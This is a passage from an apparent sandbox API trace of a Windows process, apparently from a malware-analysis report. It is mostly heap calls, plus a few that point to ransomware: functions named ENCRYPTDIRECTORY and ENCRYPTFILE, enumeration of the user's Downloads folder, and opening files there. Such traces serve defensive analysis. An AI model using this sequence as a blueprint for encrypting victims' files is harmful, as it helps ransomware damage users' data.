dwFlags=0x0, lpMem=0x42d9888 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0085.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0085.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0085.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0085.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0085.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0085.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0085.685] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0085.980] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0085.980] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x144f3f8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0085.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9aa0 [0085.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0085.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0085.980] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0085.980] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\" (normalized: "c:\\users\\fd1hvy\\downloads")) returned 0x11 [0085.980] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\*", lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9e78, cFileName=".", cAlternateFileName="")) returned 0x41ac100 [0085.981] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9e78, cFileName="..", cAlternateFileName="")) returned 1 [0085.981] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x43c9e78, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0085.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0085.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0085.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0085.981] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2170, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0xf, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3564, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="礼мńဓ+\x10")) returned 0 [0085.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0085.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0085.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0085.981] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0085.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|desktop.ini", cchCount1=12, lpString2="", cchCount2=0) returned 3 [0085.981] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0085.981] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\desktop.ini", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac000 [0085.982] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0085.982] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0085.982] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0085.982] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0085.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0085.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0085.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0085.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0085.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43c9ed8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0085.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0085.983] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0085.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0085.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0085.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0085.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0085.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0085.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0085.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0085.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0085.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0085.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0085.983] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\downloads\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0085.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0085.985] FreeLibrary (hLibModule=0x772d0000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fb0 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0085.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0085.986] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0085.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0085.987] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0085.987] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0085.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d18 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0085.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) 